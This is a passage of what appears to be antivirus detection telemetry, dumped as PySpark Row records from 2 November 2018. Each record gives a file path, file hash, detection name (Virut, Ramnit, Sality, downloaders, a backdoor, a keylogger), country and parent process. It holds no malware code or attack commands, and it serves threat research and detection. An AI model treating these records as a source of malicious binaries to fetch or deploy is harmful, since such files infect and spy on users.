parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gtaquickkeyipe.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\gtaquickkeyipe.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='troop.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\TROOP\\TROOP.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skins.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\SKINS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wizinstaller.exe', filepath='D:\\FILE\\win10pro แผ่นมากับคอมฯ\\sources\\$OEM$\\$$\\System32\\asg\\WizInstaller\\x86\\WizInstaller.exe', filesize=256000, name='W32/Infector.Gen.#M300.#R7863'), hash='20e9c72a7b16d0a91543d9447db46379b3a9fe460e1cbb7174f1a242a3fbf86b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20f956878853aaaabfa30813226bd2272ca4c5f196653a8aca18c07998c0ee56', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='774b3084e7e2ee3f38c4c6d9cc696c88c606c97b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\774b3084e7e2ee3f38c4c6d9cc696c88c606c97b', filesize=2112000, name='Adware/DealPly.20fe88.#M1.#R1'), hash='20fe88b3b788dc9b6dc96547b0c8f7d232037334196afdb1435e09dc082e5d79', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:54:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00006252', filepath='C:\\Windows\\Temp\\d0977cff-6248-4b99-80bd-c3055b8326c1\\tmp00000104\\tmp00006252', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='21025ebff3f4ef190413641b2cfc2d1958e88aee26c9257bdb7b849cd4f83d48', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='helppane.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-help-client_31bf3856ad364e35_6.1.7600.16385_none_6beee6458f6a465e\\HelpPane.exe', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='21249fc5b81a6a594e78978c64a891515354b7208ad7257614c4bb804108579b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unt9638.tmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\U9628.tmp\\UNT9638.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='2125f8fd52552fbd9a9d2f828302c672f5ab14bf17d51c8ad3345ab1dff9a80f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unt9638.tmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\U9628.tmp\\UNT9638.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='2125f8fd52552fbd9a9d2f828302c672f5ab14bf17d51c8ad3345ab1dff9a80f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vietnam.exe', filepath='D:\\الالعاب1\\حرب فيتنام\\Conflict.Vietnam.EgYuP.CoM.BY.P@WERNMAN\\Vietnam.exe', filesize=5632000, name='W32/Virut.Gen.#M1.#R1'), hash='2127e1194bf4e737e9f838b863a0274a880c98794295b01b8d45ae967a8c73b6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T18:32:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vietnam.exe', filepath='D:\\الالعاب1\\حرب فيتنام\\Conflict.Vietnam.EgYuP.CoM.BY.P@WERNMAN\\Vietnam.exe', filesize=5632000, name='W32/Virut.Gen.#M1.#R1'), hash='2127e1194bf4e737e9f838b863a0274a880c98794295b01b8d45ae967a8c73b6', metadata=Row(cmdline='C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\gameux.dll,GameUXShim {72e3db8c-cf85-462c-8b0b-855360c82731};D:\\\\\\\\الالعاب1\\\\\\\\الموتسيكل المائي\\\\\\\\JETMOTO.EXE;744', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T13:22:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vietnam.exe', filepath='D:\\الالعاب1\\حرب فيتنام\\Conflict.Vietnam.EgYuP.CoM.BY.P@WERNMAN\\Vietnam.exe', filesize=5632000, name='W32/Virut.Gen.#M1.#R1'), hash='2127e1194bf4e737e9f838b863a0274a880c98794295b01b8d45ae967a8c73b6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:f7byY\\\\\\/G42EOSw8wg.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T03:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:f7byY\\\\\\/G42EOSw8wg.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T03:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:f7byY\\\\\\/G42EOSw8wg.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T03:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='004280fb-f050-5b78-a67f-aeca8b48d242.exe', filepath='F:\\{8f874700-3975-f09f-45a5-4b73ad2651eb}\\004280fb-f050-5b78-a67f-aeca8b48d242.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:56:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9fdbe38b-3efb-bc9f-c033-5a35f6c0a759.exe', filepath='E:\\\xa0\\{16b7852e-3756-be20-2883-e519cdf11fc3}\\9fdbe38b-3efb-bc9f-c033-5a35f6c0a759.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline='-r', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T10:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='004280fb-f050-5b78-a67f-aeca8b48d242.exe', filepath='F:\\{8f874700-3975-f09f-45a5-4b73ad2651eb}\\004280fb-f050-5b78-a67f-aeca8b48d242.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:56:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='004280fb-f050-5b78-a67f-aeca8b48d242.exe', filepath='F:\\{8f874700-3975-f09f-45a5-4b73ad2651eb}\\004280fb-f050-5b78-a67f-aeca8b48d242.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:56:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecphs5_01047.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Photoshop\\TPRECPHS5_01047.exe', filesize=1452000, name='HEUR/APC.#M1.#R1'), hash='218001c21ac47fb8db0614c83852919ad66d6c93745492ba7d8531e75ac3c952', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:03:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ihctrl32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\ihctrl32.dll', filesize=1280000, name='TR/Dldr.Stantinko.21a421.#M1.#R1'), hash='21a4217fa52b44fef34afe7c146986a40e1218a883cf6332c6b0514142c5171e', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T13:33:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st3.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ST3\\ST3.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='21ec64398af28f12b7e61e9f7f765864cb4960f3adbd9599632f011dc8d24de7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='21fecdb50061690e6b36b8c19e72a9dc7f59bc25ff5c3b2c5ff0203fc42665ea', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\21FECDB50061690E6B36B8C19E72A9DC7F59BC25FF5C3B2C5FF0203FC42665EA', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='21fecdb50061690e6b36b8c19e72a9dc7f59bc25ff5c3b2c5ff0203fc42665ea', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instal_ivg2003.exe', filepath='D:\\WinMent\\Kit\\Documentatie\\05_solutii\\03_SALARII\\2003\\Fise fiscale 2003 kit finante\\instal_ivg2003.exe', filesize=1456000, name='TR/Patched.Gen.#M300.#R3374'), hash='2202132fdfe954d7db3c4ce2874721b1f05a4fa55249388276515ba3925f2a41', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:8CKaznjs9k+n4KvB.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:09:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081956-b2af4eeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-081956-B2AF4EEB', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='2267612530b04bf0a206159a44bc29f3bdc85a5c65e2cf41a4d1769297e071ad', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:21:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='22956673e55f57557f4b8f91685a00e7fb646f87e758a3e519a1429be7289f90', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:2\\\\\\/I7YfiU30u12FoH.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=37096, timestamp='2018-11-02T09:56:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5e3f741a955eabc5d14a2098fd3e3b465880a042', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\5e3f741a955eabc5d14a2098fd3e3b465880a042', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='22a3ca2013a1984d94751d00e2b1fd912028aa6c1b293e58ca16b1e315d750dd', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:11:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='22b32de2316cee834cbcc73ca670056b5b82154287c40db7ba08e4461c2e66e4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\22B32DE2316CEE834CBCC73CA670056B5B82154287C40DB7BA08E4461C2E66E4', filesize=320000, name='HEUR/AGEN.1002150.#M1.#R1'), hash='22b32de2316cee834cbcc73ca670056b5b82154287c40db7ba08e4461c2e66e4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152644-9c9ea461', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_80c54e39\\AVSCAN-20181102-151549-22F1BB06\\AVSCAN-20181102-152644-9C9EA461', filesize=640000, name='BDC/Assasin.20.B.#M1.#R1'), hash='2319cfafbdcfddcda808eeaac3eab6065a85c63d39d926a7d3c5c9909c504783', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:26:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='client.exe', filepath='C:\\Users\\X\\Desktop\\C_8_To-Disk-2\\CEHv8 Module 06 Trojans and Backdoors\\Miscellaneous Trojans\\Assasin v2.0\\Assasin 2.0 Final\\client.exe', filesize=640000, name='BDC/Assasin.20.B.#M1.#R1'), hash='2319cfafbdcfddcda808eeaac3eab6065a85c63d39d926a7d3c5c9909c504783', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\EC-Council Certified Ethical Hacker CEH v8 (Tools)\\\\\\\\EC-Council.Certified.Ethical.Hacker.CEH.v8.Tools.DVD2\\\\\\\\C_8_To-Disk-2.iso\\\\\\"', country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-02T13:54:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='23682066ff16205715fe0965362f1f41e3d9b53bca40f9b1f530d14c8c6c1782.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\23682066FF16205715FE0965362F1F41E3D9B53BCA40F9B1F530D14C8C6C1782.VIR', filesize=300000, name='TR/ATRAPS.Gen2.#M300.#R100252'), hash='23682066ff16205715fe0965362f1f41e3d9b53bca40f9b1f530d14c8c6c1782', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:41:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openvpn.exe', filepath='C:\\Program Files (x86)\\VPN Unlimited\\openvpn.exe', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='239f2c85506cf6e390ba59748b42df87f954d10ce36651c6a852bdd0614dbe71', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dtcG\\\\\\/Cv0+kKhPq9N.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T06:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xpddm.dll', filepath='C:\\orant\\BIN\\XPDDM.DLL', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='23b0f6656ea0071ca70c1a63498bd3ffcc69ee48893c62f941d76753695186ba', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:43:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xpddm.dll', filepath='\\\\?\\C:\\orant\\BIN\\XPDDM.DLL', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='23b0f6656ea0071ca70c1a63498bd3ffcc69ee48893c62f941d76753695186ba', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:11:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215521-625a9f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba3b3259\\AVSCAN-20181102-215446-5D79BFF3\\AVSCAN-20181102-215521-625A9F2C', filesize=576000, name='TR/Black.Gen2.#M1.#R1'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:55:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='C:\\Program Files\\Autodesk\\3ds Max Design 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Autodesk\\3ds Max Design 2014\\3dsmax.exe', parentsize=11076424, timestamp='2018-11-02T13:53:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='C:\\Program Files\\Autodesk\\3ds Max 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Autodesk\\3ds Max 2014\\3dsmax.exe', parentsize=11053896, timestamp='2018-11-02T07:31:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='242dcedd1ac674fc3b63637faf71ca6efd0c7aea7a382837ed25eec44cb11587', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T22:10:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vp.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\vp\\vp.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_vo.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\cw\\_VO\\_VO.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:26Z'), dt=datetime.date(2018, 11, 2)),
